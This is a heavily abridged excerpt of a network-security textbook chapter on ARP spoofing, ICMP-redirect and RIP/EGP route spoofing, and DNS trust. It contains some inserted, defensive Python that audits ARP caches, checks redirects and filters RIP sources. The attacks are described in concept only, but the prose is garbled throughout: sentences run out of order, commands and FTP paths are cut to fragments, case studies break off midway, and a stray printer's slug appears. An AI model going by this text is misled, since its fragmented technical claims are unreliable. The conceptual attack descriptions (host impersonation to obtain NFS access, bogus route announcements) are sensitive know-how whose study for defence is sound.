A more common form of spoofing that is accidental is ARP spoofing. ARP is not part of IP but part of these Ethernet-like protocols; ARP supports IP and arbitrary network-layer protocols. For local IP destinations, the hardware address to use will be the hardware address of the destination interface.


How ARP and ARP Spoofing Work
To find the hardware address, the host sends out an ARP request using the hardware broadcast address. The ARP request is essentially asking the question, “What is the hardware address corresponding to the IP address I have here?” Typically, only the host with the matching IP address sends an ARP reply and the remaining hosts ignore the ARP request.

Other hosts could potentially store the association between hardware address and IP address of the sender of the request for future reference. It will almost certainly send an IP datagram in reply to the IP datagram it is about to receive.

The association between the hardware address and the IP address of other machines on a network is stored in an ARP cache on each host. If the host finds an entry for the IP destination address, it need not make an ARP request.

Thus, when the ARP cache entry for a machine expires, an ARP request goes out to refresh the entry. The entries for its interface’s hardware will disappear from the ARP caches in the other machines on the network. Before that point in time, IP datagrams are sent out but are not received. If someone replaces its interface, the now up and running machine will have a new hardware address and will use that new hardware address in ARP replies.

Because you expect the IP address to hardware address association to change over time, the potential exists that the change may be legitimate. Someone may inadvertently assign a machine the same IP address held by another machine.

On multiuser systems, the system administrator is typically the only one who can set the IP addresses of the network interface(s). In addition, bureaucracies often separate system administrators and network administrators that use the same network. Duplication can occur either by copying the network configuration from one personal computer to another without the end user knowing the need for IP addresses to be unique.

When two machines end up with the same IP address, both of them will naturally reply to an ARP request for that address. These replies will arrive in rapid succession, typically separated by at most a few milliseconds. Other operating systems will discard ARP replies that correspond to IP addresses already in the cache.

Thus, depending on the mechanism used to process duplicate ARP replies, if a spoofer wants to be the target of the IP datagrams being sent to a particular IP address from a particular host, it needs to make sure it is either the first or the last to reply to ARP requests made by that particular host. An attacker can simply use a machine assigned, via the normal operating system configuration mechanisms, the same IP address as a machine that is currently not working. The attacker does not need to have direct access to the power switch on the machine.

An alternative to disconnecting its power is to disconnect it from the network at some point in the network wiring scheme. Doing so is less likely to draw attention or result in confusion from the machine’s user or administrator.

The room is equipped with a Unix workstation and a $15,000 ceiling-mounted video projector projecting onto a $2,000 eight-foot diameter screen. The new workstation came in and was being configured to match the configuration of the workstation in the presentation room. The technician in charge of configuring the new workstation looked up the IP address of the workstation in the presentation room and entered it into the dialog box. The systems staff wanted to be sure it was working correctly because it was difficult to fix after it was installed in the presentation room.

The next morning a presentation started in the presentation room with the old workstation.

Shortly after the new workstation booted, the presentation came to a complete halt. The workstation in the presentation room had established a TCP/IP connection with the better machine and the presenter was creating the illusion that the program was running on the old workstation. As the presentation progressed, the ongoing IP datagrams from the better computer to the old workstation used the cache entry created at the beginning of the presentation. The first time the ARP cache entry expired, the old workstation replied appropriately. Both the old and new workstations replied to the computer running the demonstration software. The new workstation did not know what to do with these datagrams and promptly sent a TCP/IP reset message in reply, resulting in the shutdown of the demonstration program.

Needless to say, the presenter was upset.


A Case Study: Malicious ARP Spoofing
As mentioned earlier, I work at a university where Computer Science allows its clients (students) temporary access to its computers. One of these clients has a laptop running Unix. This particular user has created a copy of the workstation password file on his laptop and has superuser privileges on his own laptop, which runs Unix with NFS. He shuts down the workstation and jacks his laptop into our network. Then, he launches an attack by telling his workstation to NFS mount our mission-critical filesystem. It then proceeds to send information needed to access the NFS daemon back to the IP address that just made the mount request. It puts the reply on hold and makes an ARP broadcast to determine the hardware address to which to send the reply. The low-level software takes the response, caches it, and uses it to take the reply out of the holding bin and send it out the Ethernet interface.


Preventing an ARP Spoof
It is not particularly satisfying to simply detect ARP spoofing, which only identifies a problem after it has already occurred. The devious thing about an ARP spoof is that the attack is really directed at the machine being deceived, not the machine whose IP address is being taken over.

The deception is useful to the ARP spoofer because the legitimate holder of the IP address is trusted in some way by the machine being deceived. Ideally, machines extending such trust should simply not use ARP to identify the hardware addresses of the machines they trust. Instead, the hardware address of the trusted machines should be loaded as permanent entries into the ARP cache of the trusting machine. Sending a datagram to an IP address associated with a permanent ARP cache entry will never result in an ARP request. It seems unlikely that any operating system would overwrite a permanent ARP cache entry with an unsolicited ARP reply. Of course, it will also send IP data to the machine even if the machine has been down for some time. Finally, ARP caches may be of limited size, limiting the number of permanent entries or further limiting the time a dynamic entry spends in the cache.

This command has several options. The following output is an example of what you would see on a Windows 95 machine:

Interface: 147.112.226.1
aa-00-04-00-bc-06
147.112.226.101
08-00-2b-18-93-68
147.112.226.103
00-00-c0-63-33-2d
147.112.226.105
08-00-20-0b-7b-df
147.112.226.124
08-00-2b-1c-08-68
147.112 ...

The -d option deletes the entry with the given IP address from the ARP cache. 226 ... 101

Inserting a Permanent ARP Cache Entry
The -s option inserts a permanent (static) ARP cache entry for the given IP address.

arp -s 147.112 ...

A somewhat more secure, but tedious, method is to use an operating system dependent method for querying the machine in question for its own hardware address from its console.


Inserting Many Permanent ARP Cache Entries
The -f option loads permanent entries into the ARP cache from a file containing an IP address to hardware address database. The -f option to the arp command is not available on all systems. However, it is really just a substitute for a series of arp commands with the -s option.

An ARP server responds to ARP requests on behalf of another machine by consulting (permanent) entries in its own ARP cache. However, configuring a machine to believe only in the ARP server is a difficult task for most operating systems. The ARP server will send out a reply to the same requests as a potential ARP spoofer. You cannot be sure because, as you have seen, much depends on the exact timing of the replies and the algorithms used to manage the ARP cache.

You can separate the trusted hosts (those with IP addresses that might benefit an attacker using ARP spoofing) from subnets on which an attacker might obtain access. Such subnetting prevents a spoofer from powering down one of the trusted machines and attaching to the subnet on which ARP requests from the trusting machine are broadcast.

However, this setup simply places the router in the position of being deceived by an ARP spoof. If the trusted machines are on a separate subnet that is susceptible to ARP spoofing, the router for that subnet must bear the burden of ensuring that IP datagrams get to their legitimate destination.

Finally, it is also important that trusted machines be protected from an ARP spoofer that is attempting to masquerade as the router.


Sniffing Case Study Revisited
To illustrate ARP spoofing in a familiar context, recall the solution to the sniffing problem adopted by Computer Science in the case study earlier in the chapter (see fig. 7). These segments connect to a switch in the Computer Science machine room. All five segments in Computer Science are part of a single subnet. Thus, an ARP spoof attack may be launched from any of the segments.

The analysis of the situation for the ARP spoofing problem is analogous to that for the sniffing problem. The hardware barrier used to control ARP spoofing is a router to induce subnetting rather than a bridge or a switch to induce segmenting. However, the two staff segments that were kept separate for reasons other than satisfying the trust constraints may share a subnet.

The subnet for the machine room can use high-speed network media such as Fast Ethernet, FDDI, or HyperChannel.

Problems arise, however, with respect to routing protocols. The Central Computing router will refuse to accept the routes advertised by the Computer Science router, cutting off a way for remote machines to send datagrams to machines on subnets not directly attached to the Central Computing router. Such a use of intermediaries is known as a “proxy” arrangement. A simple proxy Web server in the Computer Science machine room will reduce this awkwardness. The Central Computing router will make ARP requests to determine where to send the datagrams it is forwarding to a Computer Science segment it is not connected to. The datagrams will be delivered to the Computer Science router for forwarding, while the Central Computing router is led to believe it delivered the datagram to its destination.


Detecting an ARP Spoof
Unless you have the capability to introduce the kind of hardware barriers described previously, preventing an ARP spoof is probably not practical. When an anomaly is detected in the ARP protocol it may be legitimate, accidental, or a security breach. This chapter limits its discussion to mechanisms; it is up to the reader to decide what policies and procedures to implement after detection of a potentially serious problem takes place. At the host level, an ordinary host may attempt to detect another machine using its own IP address either by passively examining network broadcasts or by actively probing for such a machine. Finally, at the network level, a machine under control of the network administrator may examine all ARP requests and replies to check for anomalies indicating an ARP spoof is underway.

It only needs to check the target address to see if the target IP address matches its own IP address. However, once the operating system has been interrupted, it takes little extra work to check to see if the sender IP address matches its own. Such an anomaly certainly indicates a serious configuration problem and may be the result of a simplistic ARP spoof in which the attacker simply reset the IP address of the machine being used in the attack.


Host-Level Active Detection
Another precaution to detect ARP spoofs is to arrange for hosts to send out an ARP request for their own IP address, both on system startup and periodically thereafter. Actively querying ARP with one’s own IP address will catch inadvertent IP address misconfigurations as well as an attacker who is simply using an ordinary operating system with a deliberately misassigned IP address.

In particular, a technically adept attacker might modify the operating system of the machine being used to mount the attack. The availability of such sophisticated software may seem unlikely even to an advanced computer user. It is not particularly difficult for a determined attacker to obtain such an operating system.


Server-Level Detection
Alternatively, a more elaborate precaution would be to verify an ARP reply by making an RARP request for the hardware address contained in the reply. RARP requests ask the question “What is the IP address associated with the hardware address I have here?”

Traditionally, the primary use of RARP is by diskless machines with no permanent modifiable memory. RARP relies on one or more RARP servers that maintain a database of hardware addresses and the corresponding IP addresses.


Note
The basic idea of checking the validity of the results to a query by making an inverse query is generically useful. Suppose you use one value, X, as a key for a query with the database indexed on one field and get a second value, Y, from a second field as a result. If you do not, then something is wrong with the database or its searching mechanism.

When a host detects that it is being impersonated by another machine, it may be able to report the fact to its user, but once an attack is underway it may be unable to inform the network administrator who is presumably using another machine. The active querying precaution is well-known and is a common textbook exercise. If that is your situation, you probably want a software detection system that can be deployed on a single machine on your network.


Network-Level Detection via Periodic Polling
By periodically inspecting the ARP caches on machines, you should be able to detect changes in the IP address to hardware address association on those machines. At the very least, such an inspection can probably be done manually on most hosts. A program on that machine could look for inconsistencies between hosts, changes from previous reports, and conflicts between reported ARP cache information and the information in the manually maintained database—any of these may indicate a problem.

One such mechanism is SNMP—the Simple Network Management Protocol. Virtually all current systems provide bundled SNMP agents. Good SNMP management software, however, may be difficult to find and expensive to purchase and deploy. The standard SNMP MIB-I contains the address translation group, which contains a single table named “at”. The address translation group had to be deprecated in SNMP MIB-II to allow for greater flexibility because IP is now no longer the only protocol being controlled with SNMP. ipNetToMediaTable ... Many SNMPv1 agents are configured with a community name of “public” to give a read-only view of all of the objects in the MIB. A sniffer could determine the community name for the writable view and use it to alter the state of the device being controlled by the agent.

A program on the promiscuous interface’s host can inspect every packet sent on the network and monitor the network on a continuous basis, not just when troubleshooting. A network monitor can detect a change in the association between a hardware address and an IP address and report such changes immediately when they occur. (Brouters are devices that are combination bridges and routers—a hybrid device such as the Cisco AGS that is often found in multiprotocol networks where non-routable protocols must be bridged.) Also, they all typically come with SNMP agents that can send a trap message to the network operations center to report the detection of a potential ARP spoof. However, none of these devices may be successful in doing so if the spoofer is masquerading as the network operations center itself.
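The polling comparison described above and the inverse-query idea from the Note in the previous section, as an added Python example that is not from the book: ARP caches reported by three constructed hosts (ws-a, ws-b, ws-c) are checked against the previous poll, against a hand-maintained database, and against each other, and a hardware address answering for two IP addresses is caught by looking it up in the inverse table. The database pairings are constructed from the addresses in the arp listing; the 02-00-00-00-00-01 intruder MAC is constructed.

```python
from typing import Dict, List

ArpCache = Dict[str, str]   # IP address -> hardware address


def check_inverse(forward: Dict[str, str], inverse: Dict[str, str], key: str) -> bool:
    """Query with X, get Y, then query the inverse database with Y: it must give X back."""
    y = forward.get(key)
    return y is not None and inverse.get(y) == key


def audit_caches(reported: Dict[str, ArpCache], previous: Dict[str, ArpCache],
                 database: ArpCache) -> List[str]:
    """Compare polled ARP caches with the manual database, the last poll, and each other."""
    problems: List[str] = []
    merged: ArpCache = {}                       # first association seen for each IP
    for host, cache in sorted(reported.items()):
        before = previous.get(host, {})
        for ip, mac in sorted(cache.items()):
            if ip in database and database[ip] != mac:
                problems.append(f"{host}: {ip} at {mac}, database says {database[ip]}")
            if ip in before and before[ip] != mac:
                problems.append(f"{host}: {ip} changed from {before[ip]} to {mac}")
            if ip in merged and merged[ip] != mac:
                problems.append(f"{ip} seen as {merged[ip]} and {mac} on different hosts")
            merged.setdefault(ip, mac)
    # Inverse check: one hardware address should map back to exactly one IP address.
    inverse: Dict[str, str] = {}
    for ip, mac in sorted(merged.items()):
        inverse.setdefault(mac, ip)
    for ip in sorted(merged):
        if not check_inverse(merged, inverse, ip):
            problems.append(f"{merged[ip]} answers for both {inverse[merged[ip]]} and {ip}")
    return problems


INTRUDER = "02-00-00-00-00-01"       # constructed, locally administered address
DATABASE: ArpCache = {               # manually maintained; pairings constructed
    "147.112.226.1": "aa-00-04-00-bc-06",
    "147.112.226.103": "00-00-c0-63-33-2d",
    "147.112.226.105": "08-00-20-0b-7b-df",
    "147.112.226.124": "08-00-2b-1c-08-68",
}


def run_sample() -> List[str]:
    """Two constructed polls: the second shows one interface taking over two addresses."""
    previous = {
        "ws-a": {"147.112.226.1": "aa-00-04-00-bc-06", "147.112.226.103": "00-00-c0-63-33-2d"},
        "ws-b": {"147.112.226.1": "aa-00-04-00-bc-06", "147.112.226.105": "08-00-20-0b-7b-df"},
    }
    current = {
        "ws-a": {"147.112.226.1": "aa-00-04-00-bc-06", "147.112.226.103": INTRUDER},
        "ws-b": {"147.112.226.1": "aa-00-04-00-bc-06", "147.112.226.105": "08-00-20-0b-7b-df",
                 "147.112.226.124": INTRUDER},
        "ws-c": {"147.112.226.103": "00-00-c0-63-33-2d"},   # still holds the correct entry
    }
    return audit_caches(current, previous, DATABASE)
```
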

SNMP agents supporting the RMON protocol (as described in RFC 1271) are designed to do low-level monitoring involving sniffing. Locating the RMON agent on devices that connect to more than one segment will reduce the number of agents that need to be fielded. However, building your own system using freeware packages such as BTNG and Tricklet provides an alternative to expensive commercial packages.


BTNG (Beholder, The Next Generation) is an RMON agent available from the Delft University of Technology in the Netherlands via anonymous FTP. The two systems are integrated and are a good place to start to put together an ARP spoofing detection system in a network large enough to require SNMP management. Such monitoring software includes “arpmon” and “netlog” from Ohio State University. Another program to do this kind of monitoring is ARPWatch, which is more narrowly focused on the issue of looking for anomalous behavior in the ARP protocol. net ... edu:/pub/networking ...

- netlog is available from ftp ... ohio-state ...

- ARPWatch 1 ... The most recent version can be obtained via anonymous FTP to ftp ... lbl ...


Spoofing the IP Routing System
On the Internet, every machine that is active at the network layer takes part in routing decisions (bridges and repeaters are only active at lower layers). The essential routing decision is “Where should a datagram with a particular IP destination address be sent?” If the destination address matches the (sub)network address of (one of) the machine’s interface(s), then the machine routes the datagram directly to the destination hardware address.

Each machine keeps a routing table containing a list of destination (sub)networks and the IP address of the router used to forward to that (sub)network.


How Routers and Route Spoofing Work
Route spoofing can take various forms, all of which involve getting Internet machines to send routed IP datagrams somewhere other than where they should. Like ARP spoofing, route spoofing can result in a denial of service attack—datagrams do not go to the machine for which they are intended with the result that a machine appears to be unable to communicate with the network. In the process, they can filter through the network traffic, possibly making modifications to it, creating the illusion of a properly working network. If the default router is not the best choice, it sends the datagram back over the same network from which the datagram originated to a different router. ICMP includes a variety of types of messages.

A redirect message essentially says “it would be best to send datagrams to a router with IP address W.Y.B.D rather than using me as your router for that destination.” Note that the datagram did not become lost and does not need to be re-sent because the router sending the ICMP redirect has already forwarded the datagram to the appropriate router.

Turning off ICMP redirect processing is one way of avoiding the simplest of route spoofing techniques—sending illegitimate ICMP redirect messages. At the very least, a check is hopefully made to see that the IP address the message comes from corresponds to a known router. The first router on the list is the default router; the next router on the list becomes the default router in case the first one appears to be down. This prevents an ARP spoof in which a machine masquerades as one of the routers.

If a machine sends ICMP redirect messages to another machine in the network, it could cause the other machine to have an invalid routing table. A much more serious situation would arise if a machine poses as a router to intercept IP datagrams to some or all destination networks. Otherwise, it could simply forward the datagrams to the legitimate router over the same network interface on which they arrived (without the usual ICMP redirect to point back to the legitimate router). Doing so may be difficult unless your TCP/IP software is configurable. Many Unix System V machines accept a packet filter with no recompilation or relinking of the kernel.

TAP is an example of a packet filter used for monitoring.


An alternative is to validate ICMP redirect messages, such as checking that the ICMP redirect is from a router you are currently using. The ICMP redirect should contain the header of the IP datagram that was forwarded. However, such a check may add to your confidence in the validity of the redirect message and may be easier to do than the other checks because neither the routing table nor the ARP cache needs to be consulted. A routing protocol used on an ordinary host is probably not worth the effort because it will probably take more work than processing ICMP redirects unless multiple routers are available on the network. Of course, routers need routing protocols to exchange routing information with peer routers unless you use manually configured routing tables.
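The redirect validation described above, as an added Python example that is not from the book: a host parses an ICMP redirect and accepts it only if it came from the router currently used for the quoted destination, the quoted datagram is one this host sent, and the proposed router lies on the local network. The 147.112.226.0/24 addresses reuse the chapter's subnet; the 10.1.2.3 destination, the 147.112.226.124 second router, and the packets themselves are constructed.

```python
import struct
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional, Tuple

ICMP_REDIRECT = 5


@dataclass(frozen=True)
class Redirect:
    src: str        # router that sent the redirect (outer IP source address)
    gateway: str    # router the message tells us to use instead
    inner_src: str  # source of the quoted datagram that triggered the redirect
    inner_dst: str  # destination of that datagram


def parse_redirect(packet: bytes) -> Optional[Redirect]:
    """Pull the fields a host needs out of an IPv4 packet; None if not an ICMP redirect."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1 or len(packet) < ihl + 8 + 20:   # protocol 1 = ICMP
        return None
    icmp = packet[ihl:]
    if icmp[0] != ICMP_REDIRECT:
        return None
    quoted = icmp[8:]        # IP header (+ 8 bytes) of the datagram the router forwarded
    return Redirect(str(ip_address(packet[12:16])), str(ip_address(icmp[4:8])),
                    str(ip_address(quoted[12:16])), str(ip_address(quoted[16:20])))


class Host:
    def __init__(self, my_ip: str, local_net: str, default_router: str):
        self.my_ip = my_ip
        self.local_net = ip_network(local_net)
        self.routes: Dict[str, str] = {}    # destination network -> router
        self.default_router = default_router

    def router_for(self, dst: str) -> str:
        for net, router in self.routes.items():
            if ip_address(dst) in ip_network(net):
                return router
        return self.default_router

    def accept_redirect(self, r: Redirect) -> Tuple[bool, str]:
        # 1. It must come from the router currently used for that destination.
        current = self.router_for(r.inner_dst)
        if r.src != current:
            return False, f"sent by {r.src}, but {current} is the router for {r.inner_dst}"
        # 2. The quoted datagram must be one this host could have sent.
        if r.inner_src != self.my_ip:
            return False, f"quoted datagram is from {r.inner_src}, not from this host"
        # 3. The proposed router must be directly reachable on our own network.
        if ip_address(r.gateway) not in self.local_net or r.gateway == self.my_ip:
            return False, f"proposed router {r.gateway} is not on {self.local_net}"
        self.routes[f"{r.inner_dst}/32"] = r.gateway      # install a host route
        return True, f"using {r.gateway} for {r.inner_dst}"


def build_redirect(src: str, dst: str, gateway: str, inner_src: str, inner_dst: str) -> bytes:
    """Construct the packet a router would send (checksums left zero; sample use only)."""
    def ip_header(s: str, d: str, proto: int, length: int) -> bytes:
        return struct.pack("!BBHHHBBH4s4s", 0x45, 0, length, 0, 0, 64, proto, 0,
                           ip_address(s).packed, ip_address(d).packed)
    quoted = ip_header(inner_src, inner_dst, 6, 40) + b"\x00" * 8
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, 1, 0, ip_address(gateway).packed) + quoted
    return ip_header(src, dst, 1, 20 + len(icmp)) + icmp


def run_sample() -> Tuple[List[bool], str]:
    """Constructed scenario on 147.112.226.0/24: three bogus redirects, then a genuine one."""
    me, router, other_router = "147.112.226.101", "147.112.226.1", "147.112.226.124"
    far = "10.1.2.3"                               # constructed remote destination
    host = Host(me, "147.112.226.0/24", router)
    packets = [
        build_redirect("147.112.226.105", me, "147.112.226.105", me, far),  # not our router
        build_redirect(router, me, "10.9.9.9", me, far),                    # gateway off-net
        build_redirect(router, me, other_router, "147.112.226.103", far),  # quoted dgram not ours
        build_redirect(router, me, other_router, me, far),                 # genuine
    ]
    results = []
    for p in packets:
        r = parse_redirect(p)
        results.append(r is not None and host.accept_redirect(r)[0])
    return results, host.router_for(far)
```
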

Two categorizations are used to describe routing protocols: one categorization separates protocols by intended use; the other categorization separates protocols by the kind of algorithm used to determine which router to use for a given destination network.

Internal routing protocols are used between routers that are within the same corporate network and external routing protocols are used between routers that belong to different companies.

The external protocols are much more limited in the information they share. An autonomous system consists of one or more networks that may share detailed and complete routing information with each other, but do not share complete routing information with other autonomous systems. Within an autonomous system, the routers have information about how the networks are divided into subnets and about all routes to other autonomous systems. One company may also want to keep its network(s) from carrying datagrams from another company to third parties. External protocols are typically only used on “border” routers that connect autonomous systems to each other.

At times, companies with strategic alliances will have border routers connecting their networks to bypass the ISP for IP datagrams that have their source in one company’s network and their destination in the other company’s network. Today’s strategic partner may be tomorrow’s primary competitor and you have no control over the level of security provided within another autonomous region.

The other categorization of routing protocols is by how they find the best route through the Internet. Vector-distance routing protocols (also called Bellman-Ford protocols) only require that each router be aware of the routers it can deliver to directly. In link-state routing protocols, each router actively tests the status of its direct links to other routers, propagates change information about the status of such routers to all such routers, and uses an algorithm to compute the best path to all destinations from itself.

The most commonly used routing protocol is a vector-distance protocol called simply the Routing Information Protocol (RIP). According to some, RIP was introduced to IP by a graduate student at Berkeley who produced the first implementation overnight when he realized IP would need some form of routing protocol. Ordinary hosts participate in the protocol passively by listening to UDP broadcasts on port 520 to get information from the routing tables for each router on their network.

Routers participate in the protocol actively by broadcasting their entire routing table every 30 seconds. The hop count is the number of routers between the router making the broadcast and the destination network.

A router using exactly one intermediary router to reach a network would advertise a hop count of one to that network. Using such a low value eliminates routing loops quickly, but limits RIP to networks with at most 16 routers between any two hosts. On a typical Unix system, port 520 is numbered so low that special privileges are required to access it. A particularly serious situation arises if routers are passive participants in RIP, using it as an internal routing protocol.


A Case Study of a RIP-Based Route Spoof
To illustrate such an attack, assume everyone at the university is well-intentioned and the network seems to be normal. The university has so many individual systems, however, that some departments, such as Computer Science, have a separate system administration staff. Presumably, the Computer Science staff has enough common sense not to modify the wiring installed by Central Computing.

As you can imagine, Computer Science came up with the brilliant idea of installing a network that does not use the wiring installed and maintained by Centralized Computing. Network administration does not seem that hard and does not seem particularly distinct from system administration, so the Computer Science staff takes the plunge and tries to do it themselves.

The problem comes when the Computer Science head points out that it would really be nice if the new Computer Science network would communicate with the Central Computing network. The Computer Science staff can control the new router and use RIP to advertise connectivity between the Central Computing network and the Computer Science network.

At first, the system works fine. Then, one day, a departmental staff member decides to reconfigure the workstation and makes a small mistake. His error prevents machines on the Computer Science network from being able to send IP datagrams to the workstation/router because it no longer responds to their ARP requests.

This mistake, however, causes much more severe problems than anyone could have predicted. This subnet is really in a building on the far side of campus with several Central Computing routers in between Computer Science and the router in the building with this Central Computing subnet. The nearest Central Computing router decides that it can get to this subnet with a hop count of one via the Computer Science workstation/router instead of using the next Central Computing router that says it has a hop count of three to the subnet in question.

Within minutes, a large portion of the network can’t communicate with the Computer Science network or the Central Computing subnet associated with the misconfigured IP address.

Complaints are registered with Central Computing from both directions: Computer Science complains its connection to Central Computing is down and the users in the building across campus complain that their link to the multiuser computers and the Internet is down. The problem was eventually discovered when the routing tables of the routers were examined. Computer Science fixed the address on its router and solved the other half. Afterward, Central Computing figures out that someone might do such a thing on purpose, compromising the stability and security of the network.

- Use passive RIP carefully on routers ... The Central Computing routers are still active participants in RIP, broadcasting routing information to hosts every 30 seconds ... However, individual hosts are still susceptible to attack via RIP if they are passive participants in RIP ... To be secure, the passive participant in RIP must only use RIP information from trustworthy sources ... A replacement for the standard RIP daemon is GateD, developed at Carnegie-Mellon University (CMU). This program consults a configuration file when it starts ...

The GateD software is no longer available directly from CMU ... The most recent version may be obtained from the World Wide Web at http://www ... merit ... gated ... edu in the directory /net-research/gated ... Each router is configured to restrict its sources of trusted RIP information to trusted routers ...
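The trust restriction recommended above can be seen in a small model, added here as an example (it is not code from the book or from GateD). It models the RIP table of the Central Computing router nearest to Computer Science; the neighbour names, subnet and metrics are constructed to mirror the case study. The real path to the far-side subnet is learned from the next Central Computing router, and then the misconfigured Computer Science workstation/router announces the same subnet as directly attached. With plain RIP the shorter bogus route wins; with a trusted-source list it is simply ignored.

```python
"""Distance-vector route selection with a trusted-neighbour filter.

Added example, not code from the book or from GateD. Names, subnets and
metrics are constructed to mirror the case study in the text.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

RIP_INFINITY = 16  # RIP metric that means "unreachable"


@dataclass
class Route:
    subnet: str     # destination network, e.g. "10.200.0.0/16"
    next_hop: str   # neighbour router the route was learned from
    metric: int     # our hop count to the subnet (1..15 usable, 16 = unreachable)


class RipTable:
    """Routing table of one router that listens to RIP broadcasts."""

    def __init__(self, trusted_sources: Optional[Set[str]] = None) -> None:
        # None: behave like plain RIP and believe any neighbour.
        # A set: only use advertisements that come from these routers
        # (the GateD-style restriction the text recommends).
        self.trusted_sources = trusted_sources
        self.routes: Dict[str, Route] = {}
        self.rejected: List[Tuple[str, str, int]] = []

    def process_advertisement(self, source: str, subnet: str, metric: int) -> bool:
        """Apply one (subnet, metric) entry from a broadcast sent by `source`.

        The metric we record is the advertised metric plus one hop to reach
        the advertising router (RFC 1058 convention). Returns True if the
        table changed.
        """
        if self.trusted_sources is not None and source not in self.trusted_sources:
            self.rejected.append((source, subnet, metric))
            return False
        new_metric = min(metric + 1, RIP_INFINITY)
        current = self.routes.get(subnet)
        # Distance-vector rule: adopt a strictly better route, and always
        # accept an update (even a worse one) from the neighbour already in use.
        if current is None or new_metric < current.metric or current.next_hop == source:
            changed = current is None or (current.metric, current.next_hop) != (new_metric, source)
            self.routes[subnet] = Route(subnet, source, new_metric)
            return changed
        return False

    def next_hop_for(self, subnet: str) -> Optional[str]:
        route = self.routes.get(subnet)
        if route is None or route.metric >= RIP_INFINITY:
            return None
        return route.next_hop


# Constructed scenario: the far-side Central Computing subnet is really
# three hops away through cc-router-2; the misconfigured Computer Science
# workstation/router then claims the subnet is directly attached to it.
FAR_SUBNET = "10.200.0.0/16"
CC_ROUTER = "cc-router-2"
CS_BOX = "cs-workstation-router"


def run_scenario(trusted: Optional[Set[str]]) -> RipTable:
    """Build the nearest Central Computing router's table after both broadcasts."""
    table = RipTable(trusted_sources=trusted)
    table.process_advertisement(CC_ROUTER, FAR_SUBNET, metric=2)  # recorded as 3 hops
    table.process_advertisement(CS_BOX, FAR_SUBNET, metric=1)     # "directly attached": 2 hops
    return table


if __name__ == "__main__":
    print("plain RIP, any source believed:", run_scenario(None).next_hop_for(FAR_SUBNET))
    print("trusted sources only:          ", run_scenario({CC_ROUTER}).next_hop_for(FAR_SUBNET))
```

The filter is deliberately applied before the metric comparison: an untrusted neighbour never gets a chance to compete on hop count, which is exactly why a configuration error (or a deliberate announcement) on the Computer Science side cannot displace the legitimate route.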

Central Computing in the preceding example still needs to decide if it will configure the router closest to Computer Science to accept the RIP information sent to it from non-Central Computing routers ... The router, unless specially configured not to do so, will proceed to forward these datagrams to their destinations ... The routing table for the destination host will probably have a default router to use in such a case and send the IP datagram containing the reply to it ... If it does not have a default router to use for such a case, it will send an ICMP message back to the host that was attempting to send back the reply and discard the IP datagram containing the reply ... In any case, the reply is dropped by a router, an ICMP message goes to the machine that sent the reply, and no reply reaches the Computer Science network ... In particular it can exchange data between the Computer Science network and the hosts on the Central Computing subnet directly connected to the Computer Science router ...

To give Computer Science access to the rest of the network, Central Computing has several options ... This is simple, neat, and clean ...

A second option is to have the Central Computing router pay attention to RIP broadcasts from the Computer Science router but limit the information extracted from the broadcast ... Even if the Central Computing routers use a link-state protocol among themselves, the router nearest to Computer Science can use a hybrid approach to manage the oddball workstation/router that is not participating in the link-state protocol ... Each of them has a “border” router with a direct connection to the other border router ... An external routing protocol, such as EGP, is used to exchange routing information between the two border routers ... IBM’s border router inserts these routes in its routing table ...

Suppose Apple were to use EGP (the External Gateway Protocol—a name that makes it sound like there is no other alternative), a classic external routing protocol, to advertise a route to another company’s research network, Intel’s, for example, and IBM normally routed IP traffic through an ISP ... If all goes as it would normally, the IBM router sees a route to Intel through one of Apple’s border routers ...

Now, Apple is getting all of the IP traffic sent from IBM to Intel ...

p1vPHCP/nhb1
Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3
IP Spoofing and Sniffing

On the other hand, the Apple border router could be configured to discard such datagrams and Apple would have succeeded in a denial of service attack ... Alternatively, a sniffer on Apple’s internal network would now be able to intercept traffic from IBM to Intel for industrial espionage purposes ... A database of network addresses and their associated autonomous system numbers such as the one provided by InterNIC would reveal to IBM’s border router that the Intel network has an autonomous system number different from the one Apple was claiming it had when making the EGP advertisement ...


Note: EGP is no longer considered state-of-the-art in external routing protocols, but the principle remains the same for all external routing protocols ...

DNS names are easier to remember and easier for most people to work with than dotted decimal IP addresses ... Unfortunately, the use of names involves yet another layer of software, introducing another point of vulnerability for the security of the systems ... When a client connects to a named host, the client needs to convert the name to an address ... Because virtually all systems place trust in the name server, all of the special precautions described previously in this chapter to protect trust should be used to protect that trust ... 226 ... 102—the DNS name server used by my machine ...

Similarly, when a host needs to convert an address to a name it sends a reverse lookup query to a DNS name server ... However, the server must rely on the DNS system to perform a reverse lookup query to determine the name of the prospective client ... If a DNS name server is coerced into providing false data, the security of the system can become compromised ... To help you understand its structure, think of the DNS system as a distributed database consisting of records with three fields: name, address, and record type ... The database is not centralized because it would be impractical to do so—from a technical standpoint and from an administrative standpoint ... Administratively, this centralized database setup would be horribly awkward to change because thousands of network administrators would need to be checked for authenticity and privileges each time one of them makes a change ...

Each domain is administered independently of each other domain ... Each subdomain is responsible for a subset of the names of the whole domain ... The term “subdomain” is a relative term between a domain and a domain that has control over a piece of the domain ... Two types of non-local replies are possible: iterative or recursive ... If the client asks for iterative resolution, the name server simply returns the address of the name server it would have forwarded the request to and lets the client query that name server directly ... When a name server makes an authoritative response, either to an ordinary client host or another name server, the authoritative response includes a “time to live,” which amounts to a claim that the response will continue to be valid for a certain amount of time ...

Some kinds of DNS replies will clearly lead to a follow-up query ... Hence, a DNS reply not only has sections for specifying the question, answer, and authority of the answer, but also has a section for additional information ...


How DNS Spoofing Can Happen
